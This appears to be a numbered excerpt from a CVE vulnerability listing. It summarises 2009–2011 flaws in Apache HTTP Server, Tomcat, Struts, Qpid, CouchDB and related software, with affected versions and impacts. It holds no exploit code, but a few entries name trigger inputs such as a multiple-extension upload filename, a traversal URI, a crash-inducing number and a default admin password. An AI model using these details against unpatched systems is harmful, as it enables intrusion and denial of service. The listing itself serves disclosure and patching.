14919| [CVE-2011-4449] actions/files/files.php in WikkaWiki 1.3.1 and 1.3.2, when INTRANET_MODE is enabled, supports file uploads for file extensions that are typically absent from an Apache HTTP Server TypesConfig file, which makes it easier for remote attackers to execute arbitrary PHP code by placing this code in a file whose name has multiple extensions, as demonstrated by a (1) .mm or (2) .vpp file.
14920| [CVE-2011-4415] The ap_pregsub function in server/util.c in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x through 2.2.21, when the mod_setenvif module is enabled, does not restrict the size of values of environment variables, which allows local users to cause a denial of service (memory consumption or NULL pointer dereference) via a .htaccess file with a crafted SetEnvIf directive, in conjunction with a crafted HTTP request header, related to (1) the "len +=" statement and (2) the apr_pcalloc function call, a different vulnerability than CVE-2011-3607.
14921| [CVE-2011-4317] The mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42, 2.0.x through 2.0.64, and 2.2.x through 2.2.21, when the Revision 1179239 patch is in place, does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers via a malformed URI containing an @ (at sign) character and a : (colon) character in invalid positions. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-3368.
14922| [CVE-2011-3639] The mod_proxy module in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x before 2.2.18, when the Revision 1179239 patch is in place, does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers by using the HTTP/0.9 protocol with a malformed URI containing an initial @ (at sign) character. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-3368.
14923| [CVE-2011-3620] Apache Qpid 0.12 does not properly verify credentials during the joining of a cluster, which allows remote attackers to obtain access to the messaging functionality and job functionality of a cluster by leveraging knowledge of a cluster-username.
14924| [CVE-2011-3607] Integer overflow in the ap_pregsub function in server/util.c in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x through 2.2.21, when the mod_setenvif module is enabled, allows local users to gain privileges via a .htaccess file with a crafted SetEnvIf directive, in conjunction with a crafted HTTP request header, leading to a heap-based buffer overflow.
14925| [CVE-2011-3376] org/apache/catalina/core/DefaultInstanceManager.java in Apache Tomcat 7.x before 7.0.22 does not properly restrict ContainerServlets in the Manager application, which allows local users to gain privileges by using an untrusted web application to access the Manager application's functionality.
14926| [CVE-2011-3375] Apache Tomcat 6.0.30 through 6.0.33 and 7.x before 7.0.22 does not properly perform certain caching and recycling operations involving request objects, which allows remote attackers to obtain unintended read access to IP address and HTTP header information in opportunistic circumstances by reading TCP data.
14927| [CVE-2011-3368] The mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42, 2.0.x through 2.0.64, and 2.2.x through 2.2.21 does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers via a malformed URI containing an initial @ (at sign) character.
14928| [CVE-2011-3348] The mod_proxy_ajp module in the Apache HTTP Server before 2.2.21, when used with mod_proxy_balancer in certain configurations, allows remote attackers to cause a denial of service (temporary "error state" in the backend server) via a malformed HTTP request.
14929| [CVE-2011-3192] The byterange filter in the Apache HTTP Server 1.3.x, 2.0.x through 2.0.64, and 2.2.x through 2.2.19 allows remote attackers to cause a denial of service (memory and CPU consumption) via a Range header that expresses multiple overlapping ranges, as exploited in the wild in August 2011, a different vulnerability than CVE-2007-0086.
14930| [CVE-2011-3190] Certain AJP protocol connector implementations in Apache Tomcat 7.0.0 through 7.0.20, 6.0.0 through 6.0.33, 5.5.0 through 5.5.33, and possibly other versions allow remote attackers to spoof AJP requests, bypass authentication, and obtain sensitive information by causing the connector to interpret a request body as a new request.
14931| [CVE-2011-2729] native/unix/native/jsvc-unix.c in jsvc in the Daemon component 1.0.3 through 1.0.6 in Apache Commons, as used in Apache Tomcat 5.5.32 through 5.5.33, 6.0.30 through 6.0.32, and 7.0.x before 7.0.20 on Linux, does not drop capabilities, which allows remote attackers to bypass read permissions for files via a request to an application.
14932| [CVE-2011-2712] Cross-site scripting (XSS) vulnerability in Apache Wicket 1.4.x before 1.4.18, when setAutomaticMultiWindowSupport is enabled, allows remote attackers to inject arbitrary web script or HTML via unspecified parameters.
14933| [CVE-2011-2688] SQL injection vulnerability in mysql/mysql-auth.pl in the mod_authnz_external module 3.2.5 and earlier for the Apache HTTP Server allows remote attackers to execute arbitrary SQL commands via the user field.
14934| [CVE-2011-2526] Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.19, when sendfile is enabled for the HTTP APR or HTTP NIO connector, does not validate certain request attributes, which allows local users to bypass intended file access restrictions or cause a denial of service (infinite loop or JVM crash) by leveraging an untrusted web application.
14935| [CVE-2011-2516] Off-by-one error in the XML signature feature in Apache XML Security for C++ 1.6.0, as used in Shibboleth before 2.4.3 and possibly other products, allows remote attackers to cause a denial of service (crash) via a signature using a large RSA key, which triggers a buffer overflow.
14936| [CVE-2011-2481] Apache Tomcat 7.0.x before 7.0.17 permits web applications to replace an XML parser used for other web applications, which allows local users to read or modify the (1) web.xml, (2) context.xml, or (3) tld files of arbitrary web applications via a crafted application that is loaded earlier than the target application. NOTE: this vulnerability exists because of a CVE-2009-0783 regression.
14937| [CVE-2011-2329] The rampart_timestamp_token_validate function in util/rampart_timestamp_token.c in Apache Rampart/C 1.3.0 does not properly calculate the expiration of timestamp tokens, which allows remote attackers to bypass intended access restrictions by leveraging an expired token, a different vulnerability than CVE-2011-0730.
14938| [CVE-2011-2204] Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.17, when the MemoryUserDatabase is used, creates log entries containing passwords upon encountering errors in JMX user creation, which allows local users to obtain sensitive information by reading a log file.
14939| [CVE-2011-2088] XWork 2.2.1 in Apache Struts 2.2.1, and OpenSymphony XWork in OpenSymphony WebWork, allows remote attackers to obtain potentially sensitive information about internal Java class paths via vectors involving an s:submit element and a nonexistent method, a different vulnerability than CVE-2011-1772.3.
14940| [CVE-2011-2087] Multiple cross-site scripting (XSS) vulnerabilities in component handlers in the javatemplates (aka Java Templates) plugin in Apache Struts 2.x before 2.2.3 allow remote attackers to inject arbitrary web script or HTML via an arbitrary parameter value to a .action URI, related to improper handling of value attributes in (1) FileHandler.java, (2) HiddenHandler.java, (3) PasswordHandler.java, (4) RadioHandler.java, (5) ResetHandler.java, (6) SelectHandler.java, (7) SubmitHandler.java, and (8) TextFieldHandler.java.
14941| [CVE-2011-1928] The fnmatch implementation in apr_fnmatch.c in the Apache Portable Runtime (APR) library 1.4.3 and 1.4.4, and the Apache HTTP Server 2.2.18, allows remote attackers to cause a denial of service (infinite loop) via a URI that does not match unspecified types of wildcard patterns, as demonstrated by attacks against mod_autoindex in httpd when a /*/WEB-INF/ configuration pattern is used. NOTE: this issue exists because of an incorrect fix for CVE-2011-0419.
14942| [CVE-2011-1921] The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion 1.5.x and 1.6.x before 1.6.17, when the SVNPathAuthz short_circuit option is disabled, does not properly enforce permissions for files that had been publicly readable in the past, which allows remote attackers to obtain sensitive information via a replay REPORT operation.
14943| [CVE-2011-1783] The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion 1.5.x and 1.6.x before 1.6.17, when the SVNPathAuthz short_circuit option is enabled, allows remote attackers to cause a denial of service (infinite loop and memory consumption) in opportunistic circumstances by requesting data.
14944| [CVE-2011-1772] Multiple cross-site scripting (XSS) vulnerabilities in XWork in Apache Struts 2.x before 2.2.3, and OpenSymphony XWork in OpenSymphony WebWork, allow remote attackers to inject arbitrary web script or HTML via vectors involving (1) an action name, (2) the action attribute of an s:submit element, or (3) the method attribute of an s:submit element.
14945| [CVE-2011-1752] The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion before 1.6.17, allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a request for a baselined WebDAV resource, as exploited in the wild in May 2011.
14946| [CVE-2011-1610] Multiple SQL injection vulnerabilities in xmldirectorylist.jsp in the embedded Apache HTTP Server component in Cisco Unified Communications Manager (aka CUCM, formerly CallManager) 6.x before 6.1(5)su3, 7.x before 7.1(5)su4, 8.0 before 8.0(3a)su2, and 8.5 before 8.5(1)su1 allow remote attackers to execute arbitrary SQL commands via the (1) f, (2) l, or (3) n parameter, aka Bug ID CSCtj42064.
14947| [CVE-2011-1582] Apache Tomcat 7.0.12 and 7.0.13 processes the first request to a servlet without following security constraints that have been configured through annotations, which allows remote attackers to bypass intended access restrictions via HTTP requests. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-1088, CVE-2011-1183, and CVE-2011-1419.
14948| [CVE-2011-1571] Unspecified vulnerability in the XSL Content portlet in Liferay Portal Community Edition (CE) 5.x and 6.x before 6.0.6 GA, when Apache Tomcat is used, allows remote attackers to execute arbitrary commands via unknown vectors.
14949| [CVE-2011-1570] Cross-site scripting (XSS) vulnerability in Liferay Portal Community Edition (CE) 6.x before 6.0.6 GA, when Apache Tomcat is used, allows remote authenticated users to inject arbitrary web script or HTML via a message title, a different vulnerability than CVE-2004-2030.
14950| [CVE-2011-1503] The XSL Content portlet in Liferay Portal Community Edition (CE) 5.x and 6.x before 6.0.6 GA, when Apache Tomcat or Oracle GlassFish is used, allows remote authenticated users to read arbitrary (1) XSL and (2) XML files via a file:/// URL.
14951| [CVE-2011-1502] Liferay Portal Community Edition (CE) 6.x before 6.0.6 GA, when Apache Tomcat is used, allows remote authenticated users to read arbitrary files via an entity declaration in conjunction with an entity reference, related to an XML External Entity (aka XXE) issue.
14952| [CVE-2011-1498] Apache HttpClient 4.x before 4.1.1 in Apache HttpComponents, when used with an authenticating proxy server, sends the Proxy-Authorization header to the origin server, which allows remote web servers to obtain sensitive information by logging this header.
14953| [CVE-2011-1475] The HTTP BIO connector in Apache Tomcat 7.0.x before 7.0.12 does not properly handle HTTP pipelining, which allows remote attackers to read responses intended for other clients in opportunistic circumstances by examining the application data in HTTP packets, related to "a mix-up of responses for requests from different users."
14954| [CVE-2011-1419] Apache Tomcat 7.x before 7.0.11, when web.xml has no security constraints, does not follow ServletSecurity annotations, which allows remote attackers to bypass intended access restrictions via HTTP requests to a web application. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-1088.
14955| [CVE-2011-1318] Memory leak in org.apache.jasper.runtime.JspWriterImpl.response in the JavaServer Pages (JSP) component in IBM WebSphere Application Server (WAS) before 7.0.0.15 allows remote attackers to cause a denial of service (memory consumption) by accessing a JSP page of an application that is repeatedly stopped and restarted.
14956| [CVE-2011-1184] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 does not have the expected countermeasures against replay attacks, which makes it easier for remote attackers to bypass intended access restrictions by sniffing the network for valid requests, related to lack of checking of nonce (aka server nonce) and nc (aka nonce-count or client nonce count) values.
14957| [CVE-2011-1183] Apache Tomcat 7.0.11, when web.xml has no login configuration, does not follow security constraints, which allows remote attackers to bypass intended access restrictions via HTTP requests to a meta-data complete web application. NOTE: this vulnerability exists because of an incorrect fix for CVE-2011-1088 and CVE-2011-1419.
14958| [CVE-2011-1176] The configuration merger in itk.c in the Steinar H. Gunderson mpm-itk Multi-Processing Module 2.2.11-01 and 2.2.11-02 for the Apache HTTP Server does not properly handle certain configuration sections that specify NiceValue but not AssignUserID, which might allow remote attackers to gain privileges by leveraging the root uid and root gid of an mpm-itk process.
14959| [CVE-2011-1088] Apache Tomcat 7.x before 7.0.10 does not follow ServletSecurity annotations, which allows remote attackers to bypass intended access restrictions via HTTP requests to a web application.
14960| [CVE-2011-1077] Multiple cross-site scripting (XSS) vulnerabilities in Apache Archiva 1.0 through 1.2.2, and 1.3.x before 1.3.5, allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
14961| [CVE-2011-1026] Multiple cross-site request forgery (CSRF) vulnerabilities in Apache Archiva 1.0 through 1.2.2, and 1.3.x before 1.3.5, allow remote attackers to hijack the authentication of administrators.
14962| [CVE-2011-0715] The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion before 1.6.16, allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a request that contains a lock token.
14963| [CVE-2011-0534] Apache Tomcat 7.0.0 through 7.0.6 and 6.0.0 through 6.0.30 does not enforce the maxHttpHeaderSize limit for requests involving the NIO HTTP connector, which allows remote attackers to cause a denial of service (OutOfMemoryError) via a crafted request.
14964| [CVE-2011-0533] Cross-site scripting (XSS) vulnerability in Apache Continuum 1.1 through 1.2.3.1, 1.3.6, and 1.4.0 Beta
14965| [CVE-2011-0419] Stack consumption vulnerability in the fnmatch implementation in apr_fnmatch.c in the Apache Portable Runtime (APR) library before 1.4.3 and the Apache HTTP Server before 2.2.18, and in fnmatch.c in libc in NetBSD 5.1, OpenBSD 4.8, FreeBSD, Apple Mac OS X 10.6, Oracle Solaris 10, and Android, allows context-dependent attackers to cause a denial of service (CPU and memory consumption) via *? sequences in the first argument, as demonstrated by attacks against mod_autoindex in httpd.
14966| [CVE-2011-0013] Multiple cross-site scripting (XSS) vulnerabilities in the HTML Manager Interface in Apache Tomcat 5.5 before 5.5.32, 6.0 before 6.0.30, and 7.0 before 7.0.6 allow remote attackers to inject arbitrary web script or HTML, as demonstrated via the display-name tag.
14967| [CVE-2010-4644] Multiple memory leaks in rev_hunt.c in Apache Subversion before 1.6.15 allow remote authenticated users to cause a denial of service (memory consumption and daemon crash) via the -g option to the blame command.
14968| [CVE-2010-4539] The walk function in repos.c in the mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion before 1.6.15, allows remote authenticated users to cause a denial of service (NULL pointer dereference and daemon crash) via vectors that trigger the walking of SVNParentPath collections.
14969| [CVE-2010-4476] The Double.parseDouble method in Java Runtime Environment (JRE) in Oracle Java SE and Java for Business 6 Update 23 and earlier, 5.0 Update 27 and earlier, and 1.4.2_29 and earlier, as used in OpenJDK, Apache, JBossweb, and other products, allows remote attackers to cause a denial of service via a crafted string that triggers an infinite loop of estimations during conversion to a double-precision binary floating-point number, as demonstrated using 2.2250738585072012e-308.
14970| [CVE-2010-4455] Unspecified vulnerability in the Oracle HTTP Server component in Oracle Fusion Middleware 11.1.1.2 and 11.1.1.3 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Apache Plugin.
14971| [CVE-2010-4408] Apache Archiva 1.0 through 1.0.3, 1.1 through 1.1.4, 1.2 through 1.2.2, and 1.3 through 1.3.1 does not require entry of the administrator's password at the time of modifying a user account, which makes it easier for context-dependent attackers to gain privileges by leveraging a (1) unattended workstation or (2) cross-site request forgery (CSRF) vulnerability, a related issue to CVE-2010-3449.
14972| [CVE-2010-4312] The default configuration of Apache Tomcat 6.x does not include the HTTPOnly flag in a Set-Cookie header, which makes it easier for remote attackers to hijack a session via script access to a cookie.
14973| [CVE-2010-4172] Multiple cross-site scripting (XSS) vulnerabilities in the Manager application in Apache Tomcat 6.0.12 through 6.0.29 and 7.0.0 through 7.0.4 allow remote attackers to inject arbitrary web script or HTML via the (1) orderBy or (2) sort parameter to sessionsList.jsp, or unspecified input to (3) sessionDetail.jsp or (4) java/org/apache/catalina/manager/JspHelper.java, related to use of untrusted web applications.
14974| [CVE-2010-3872] The fcgid_header_bucket_read function in fcgid_bucket.c in the mod_fcgid module before 2.3.6 for the Apache HTTP Server does not use bytewise pointer arithmetic in certain circumstances, which has unspecified impact and attack vectors related to "untrusted FastCGI applications" and a "stack buffer overwrite."
14975| [CVE-2010-3863] Apache Shiro before 1.1.0, and JSecurity 0.9.x, does not canonicalize URI paths before comparing them to entries in the shiro.ini file, which allows remote attackers to bypass intended access restrictions via a crafted request, as demonstrated by the /./account/index.jsp URI.
14976| [CVE-2010-3854] Multiple cross-site scripting (XSS) vulnerabilities in the web administration interface (aka Futon) in Apache CouchDB 0.8.0 through 1.0.1 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
14977| [CVE-2010-3718] Apache Tomcat 7.0.0 through 7.0.3, 6.0.x, and 5.5.x, when running within a SecurityManager, does not make the ServletContext attribute read-only, which allows local web applications to read or write files outside of the intended working directory, as demonstrated using a directory traversal attack.
14978| [CVE-2010-3449] Cross-site request forgery (CSRF) vulnerability in Redback before 1.2.4, as used in Apache Archiva 1.0 through 1.0.3, 1.1 through 1.1.4, 1.2 through 1.2.2, and 1.3 through 1.3.1
14979| [CVE-2010-3315] authz.c in the mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion 1.5.x before 1.5.8 and 1.6.x before 1.6.13, when SVNPathAuthz short_circuit is enabled, does not properly handle a named repository as a rule scope, which allows remote authenticated users to bypass intended access restrictions via svn commands.
14980| [CVE-2010-3083] sys/ssl/SslSocket.cpp in qpidd in Apache Qpid, as used in Red Hat Enterprise MRG before 1.2.2 and other products, when SSL is enabled, allows remote attackers to cause a denial of service (daemon outage) by connecting to the SSL port but not participating in an SSL handshake.
14981| [CVE-2010-2952] Apache Traffic Server before 2.0.1, and 2.1.x before 2.1.2-unstable, does not properly choose DNS source ports and transaction IDs, and does not properly use DNS query fields to validate responses, which makes it easier for man-in-the-middle attackers to poison the internal DNS cache via a crafted response.
14982| [CVE-2010-2791] mod_proxy in httpd in Apache HTTP Server 2.2.9, when running on Unix, does not close the backend connection if a timeout occurs when reading a response from a persistent connection, which allows remote attackers to obtain a potentially sensitive response intended for a different client in opportunistic circumstances via a normal HTTP request. NOTE: this is the same issue as CVE-2010-2068, but for a different OS and set of affected versions.
14983| [CVE-2010-2375] Package/Privilege: Plugins for Apache, Sun and IIS web servers Unspecified vulnerability in the WebLogic Server component in Oracle Fusion Middleware 7.0 SP7, 8.1 SP6, 9.0, 9.1, 9.2 MP3, 10.0 MP2, 10.3.2, and 10.3.3 allows remote attackers to affect confidentiality and integrity, related to IIS.
14984| [CVE-2010-2234] Cross-site request forgery (CSRF) vulnerability in Apache CouchDB 0.8.0 through 0.11.0 allows remote attackers to hijack the authentication of administrators for direct requests to an installation URL.
14985| [CVE-2010-2227] Apache Tomcat 5.5.0 through 5.5.29, 6.0.0 through 6.0.27, and 7.0.0 beta does not properly handle an invalid Transfer-Encoding header, which allows remote attackers to cause a denial of service (application outage) or obtain sensitive information via a crafted header that interferes with "recycling of a buffer."
14986| [CVE-2010-2103] Cross-site scripting (XSS) vulnerability in axis2-admin/axis2-admin/engagingglobally in the administration console in Apache Axis2/Java 1.4.1, 1.5.1, and possibly other versions, as used in SAP Business Objects 12, 3com IMC, and possibly other products, allows remote attackers to inject arbitrary web script or HTML via the modules parameter. NOTE: some of these details are obtained from third party information.
14987| [CVE-2010-2086] Apache MyFaces 1.1.7 and 1.2.8, as used in IBM WebSphere Application Server and other applications, does not properly handle an unencrypted view state, which allows remote attackers to conduct cross-site scripting (XSS) attacks or execute arbitrary Expression Language (EL) statements via vectors that involve modifying the serialized view object.
14988| [CVE-2010-2076] Apache CXF 2.0.x before 2.0.13, 2.1.x before 2.1.10, and 2.2.x before 2.2.9, as used in Apache ServiceMix, Apache Camel, Apache Chemistry, Apache jUDDI, Apache Geronimo, and other products, does not properly reject DTDs in SOAP messages, which allows remote attackers to read arbitrary files, send HTTP requests to intranet servers, or cause a denial of service (CPU and memory consumption) via a crafted DTD, as demonstrated by an entity declaration in a request to samples/wsdl_first_pure_xml, a similar issue to CVE-2010-1632.
14989| [CVE-2010-2068] mod_proxy_http.c in mod_proxy_http in the Apache HTTP Server 2.2.9 through 2.2.15, 2.3.4-alpha, and 2.3.5-alpha on Windows, NetWare, and OS/2, in certain configurations involving proxy worker pools, does not properly detect timeouts, which allows remote attackers to obtain a potentially sensitive response intended for a different client in opportunistic circumstances via a normal HTTP request.
14990| [CVE-2010-2057] shared/util/StateUtils.java in Apache MyFaces 1.1.x before 1.1.8, 1.2.x before 1.2.9, and 2.0.x before 2.0.1 uses an encrypted View State without a Message Authentication Code (MAC), which makes it easier for remote attackers to perform successful modifications of the View State via a padding oracle attack.
14991| [CVE-2010-1632] Apache Axis2 before 1.5.2, as used in IBM WebSphere Application Server (WAS) 7.0 through 7.0.0.12, IBM Feature Pack for Web Services 6.1.0.9 through 6.1.0.32, IBM Feature Pack for Web 2.0 1.0.1.0, Apache Synapse, Apache ODE, Apache Tuscany, Apache Geronimo, and other products, does not properly reject DTDs in SOAP messages, which allows remote attackers to read arbitrary files, send HTTP requests to intranet servers, or cause a denial of service (CPU and memory consumption) via a crafted DTD, as demonstrated by an entity declaration in a request to the Synapse SimpleStockQuoteService.
14992| [CVE-2010-1623] Memory leak in the apr_brigade_split_line function in buckets/apr_brigade.c in the Apache Portable Runtime Utility library (aka APR-util) before 1.3.10, as used in the mod_reqtimeout module in the Apache HTTP Server and other software, allows remote attackers to cause a denial of service (memory consumption) via unspecified vectors related to the destruction of an APR bucket.
14993| [CVE-2010-1587] The Jetty ResourceHandler in Apache ActiveMQ 5.x before 5.3.2 and 5.4.x before 5.4.0 allows remote attackers to read JSP source code via a // (slash slash) initial substring in a URI for (1) admin/index.jsp, (2) admin/queues.jsp, or (3) admin/topics.jsp.
14994| [CVE-2010-1452] The (1) mod_cache and (2) mod_dav modules in the Apache HTTP Server 2.2.x before 2.2.16 allow remote attackers to cause a denial of service (process crash) via a request that lacks a path.
14995| [CVE-2010-1325] Cross-site request forgery (CSRF) vulnerability in the apache2-slms package in SUSE Lifecycle Management Server (SLMS) 1.0 on SUSE Linux Enterprise (SLE) 11 allows remote attackers to hijack the authentication of unspecified victims via vectors related to improper parameter quoting. NOTE: some sources report that this is a vulnerability in a product named "Apache SLMS," but that is incorrect.
14996| [CVE-2010-1244] Cross-site request forgery (CSRF) vulnerability in createDestination.action in Apache ActiveMQ before 5.3.1 allows remote attackers to hijack the authentication of unspecified victims for requests that create queues via the JMSDestination parameter in a queue action.
14997| [CVE-2010-1157] Apache Tomcat 5.5.0 through 5.5.29 and 6.0.0 through 6.0.26 might allow remote attackers to discover the server's hostname or IP address by sending a request for a resource that requires (1) BASIC or (2) DIGEST authentication, and then reading the realm field in the WWW-Authenticate header in the reply.
14998| [CVE-2010-1151] Race condition in the mod_auth_shadow module for the Apache HTTP Server allows remote attackers to bypass authentication, and read and possibly modify data, via vectors related to improper interaction with an external helper application for validation of credentials.
14999| [CVE-2010-0684] Cross-site scripting (XSS) vulnerability in createDestination.action in Apache ActiveMQ before 5.3.1 allows remote authenticated users to inject arbitrary web script or HTML via the JMSDestination parameter in a queue action.
15000| [CVE-2010-0434] The ap_read_request function in server/protocol.c in the Apache HTTP Server 2.2.x before 2.2.15, when a multithreaded MPM is used, does not properly handle headers in subrequests in certain circumstances involving a parent request that has a body, which might allow remote attackers to obtain sensitive information via a crafted request that triggers access to memory locations associated with an earlier request.
15001| [CVE-2010-0432] Multiple cross-site scripting (XSS) vulnerabilities in the Apache Open For Business Project (aka OFBiz) 09.04 and earlier, as used in Opentaps, Neogia, and Entente Oya, allow remote attackers to inject arbitrary web script or HTML via (1) the productStoreId parameter to control/exportProductListing, (2) the partyId parameter to partymgr/control/viewprofile (aka partymgr/control/login), (3) the start parameter to myportal/control/showPortalPage, (4) an invalid URI beginning with /facility/control/ReceiveReturn (aka /crmsfa/control/ReceiveReturn or /cms/control/ReceiveReturn), (5) the contentId parameter (aka the entityName variable) to ecommerce/control/ViewBlogArticle, (6) the entityName parameter to webtools/control/FindGeneric, or the (7) subject or (8) content parameter to an unspecified component under ecommerce/control/contactus.
15002| [CVE-2010-0425] modules/arch/win32/mod_isapi.c in mod_isapi in the Apache HTTP Server 2.0.37 through 2.0.63, 2.2.0 through 2.2.14, and 2.3.x before 2.3.7, when running on Windows, does not ensure that request processing is complete before calling isapi_unload for an ISAPI .dll module, which allows remote attackers to execute arbitrary code via unspecified vectors related to a crafted request, a reset packet, and "orphaned callback pointers."
15003| [CVE-2010-0408] The ap_proxy_ajp_request function in mod_proxy_ajp.c in mod_proxy_ajp in the Apache HTTP Server 2.2.x before 2.2.15 does not properly handle certain situations in which a client sends no request body, which allows remote attackers to cause a denial of service (backend server outage) via a crafted request, related to use of a 500 error code instead of the appropriate 400 error code.
15004| [CVE-2010-0390] Unrestricted file upload vulnerability in maxImageUpload/index.php in PHP F1 Max's Image Uploader 1.0, when Apache is not configured to handle the mime-type for files with pjpeg or jpeg extensions, allows remote attackers to execute arbitrary code by uploading a file with a pjpeg or jpeg extension, then accessing it via a direct request to the file in original/. NOTE: some of these details are obtained from third party information.
15005| [CVE-2010-0219] Apache Axis2, as used in dswsbobje.war in SAP BusinessObjects Enterprise XI 3.2, CA ARCserve D2D r15, and other products, has a default password of axis2 for the admin account, which makes it easier for remote attackers to execute arbitrary code by uploading a crafted web service.
15006| [CVE-2010-0010] Integer overflow in the ap_proxy_send_fb function in proxy/proxy_util.c in mod_proxy in the Apache HTTP Server before 1.3.42 on 64-bit platforms allows remote origin servers to cause a denial of service (daemon crash) or possibly execute arbitrary code via a large chunk size that triggers a heap-based buffer overflow.
15007| [CVE-2010-0009] Apache CouchDB 0.8.0 through 0.10.1 allows remote attackers to obtain sensitive information by measuring the completion time of operations that verify (1) hashes or (2) passwords.
15008| [CVE-2009-5120] The default configuration of Apache Tomcat in Websense Manager in Websense Web Security 7.0 and Web Filter 7.0 allows connections to TCP port 1812 from arbitrary source IP addresses, which makes it easier for remote attackers to conduct cross-site scripting (XSS) attacks via UTF-7 text to the 404 error page of a Project Woodstock service on this port.
15009| [CVE-2009-5119] The default configuration of Apache Tomcat in Websense Manager in Websense Web Security 7.0 and Web Filter 7.0 enables weak SSL ciphers in conf/server.xml, which makes it easier for remote attackers to obtain sensitive information by sniffing the network and then conducting a brute-force attack against encrypted session data.
15010| [CVE-2009-5006] The SessionAdapter::ExchangeHandlerImpl::checkAlternate function in broker/SessionAdapter.cpp in the C++ Broker component in Apache Qpid before 0.6, as used in Red Hat Enterprise MRG before 1.3 and other products, allows remote authenticated users to cause a denial of service (NULL pointer dereference, daemon crash, and cluster outage) by attempting to modify the alternate of an exchange.
15011| [CVE-2009-5005] The Cluster::deliveredEvent function in cluster/Cluster.cpp in Apache Qpid, as used in Red Hat Enterprise MRG before 1.3 and other products, allows remote attackers to cause a denial of service (daemon crash and cluster outage) via invalid AMQP data.
15012| [CVE-2009-4355] Memory leak in the zlib_stateful_finish function in crypto/comp/c_zlib.c in OpenSSL 0.9.8l and earlier and 1.0.0 Beta through Beta 4 allows remote attackers to cause a denial of service (memory consumption) via vectors that trigger incorrect calls to the CRYPTO_cleanup_all_ex_data function, as demonstrated by use of SSLv3 and PHP with the Apache HTTP Server, a related issue to CVE-2008-1678.
15013| [CVE-2009-4269] The password hash generation algorithm in the BUILTIN authentication functionality for Apache Derby before 10.6.1.0 performs a transformation that reduces the size of the set of inputs to SHA-1, which produces a small search space that makes it easier for local and possibly remote attackers to crack passwords by generating hash collisions, related to password substitution.
15014| [CVE-2009-3923] The VirtualBox 2.0.8 and 2.0.10 web service in Sun Virtual Desktop Infrastructure (VDI) 3.0 does not require authentication, which allows remote attackers to obtain unspecified access via vectors involving requests to an Apache HTTP Server.
15015| [CVE-2009-3890] Unrestricted file upload vulnerability in the wp_check_filetype function in wp-includes/functions.php in WordPress before 2.8.6, when a certain configuration of the mod_mime module in the Apache HTTP Server is enabled, allows remote authenticated users to execute arbitrary code by posting an attachment with a multiple-extension filename, and then accessing this attachment via a direct request to a wp-content/uploads/ pathname, as demonstrated by a .php.jpg filename.
15016| [CVE-2009-3843] HP Operations Manager 8.10 on Windows contains a "hidden account" in the XML file that specifies Tomcat users, which allows remote attackers to conduct unrestricted file upload attacks, and thereby execute arbitrary code, by using the org.apache.catalina.manager.HTMLManagerServlet class to make requests to manager/html/upload.
15017| [CVE-2009-3821] Cross-site scripting (XSS) vulnerability in the Apache Solr Search (solr) extension 1.0.0 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
15018| [CVE-2009-3555] The TLS protocol, and the SSL protocol 3.0 and possibly earlier, as used in Microsoft Internet Information Services (IIS) 7.0, mod_ssl in the Apache HTTP Server 2.2.14 and earlier, OpenSSL before 0.9.8l, GnuTLS 2.8.5 and earlier, Mozilla Network Security Services (NSS) 3.12.4 and earlier, multiple Cisco products, and other products, does not properly associate renegotiation handshakes with an existing connection, which allows man-in-the-middle attackers to insert data into HTTPS sessions, and possibly other types of sessions protected by TLS or SSL, by sending an unauthenticated request that is processed retroactively by a server in a post-renegotiation context, related to a "plaintext injection" attack, aka the "Project Mogul" issue.
15019| [CVE-2009-3548] The Windows installer for Apache Tomcat 6.0.0 through 6.0.20, 5.5.0 through 5.5.28, and possibly earlier versions uses a blank default password for the administrative user, which allows remote attackers to gain privileges.
15020| [CVE-2009-3250] The saveForwardAttachments procedure in the Compose Mail functionality in vtiger CRM 5.0.4 allows remote authenticated users to execute arbitrary code by composing an e-mail message with an attachment filename ending in (1) .php in installations based on certain Apache HTTP Server configurations, (2) .php. on Windows, or (3) .php/ on Linux, and then making a direct request to a certain pathname under storage/.
15021| [CVE-2009-3095] The mod_proxy_ftp module in the Apache HTTP Server allows remote attackers to bypass intended access restrictions and send arbitrary commands to an FTP server via vectors related to the embedding of these commands in the Authorization HTTP header, as demonstrated by a certain module in VulnDisco Pack Professional 8.11.
15022| [CVE-2009-3094] The ap_proxy_ftp_handler function in modules/proxy/proxy_ftp.c in the mod_proxy_ftp module in the Apache HTTP Server 2.0.63 and 2.2.13 allows remote FTP servers to cause a denial of service (NULL pointer dereference and child process crash) via a malformed reply to an EPSV command.
15023| [CVE-2009-2902] Directory traversal vulnerability in Apache Tomcat 5.5.0 through 5.5.28 and 6.0.0 through 6.0.20 allows remote attackers to delete work-directory files via directory traversal sequences in a WAR filename, as demonstrated by the ...war filename.
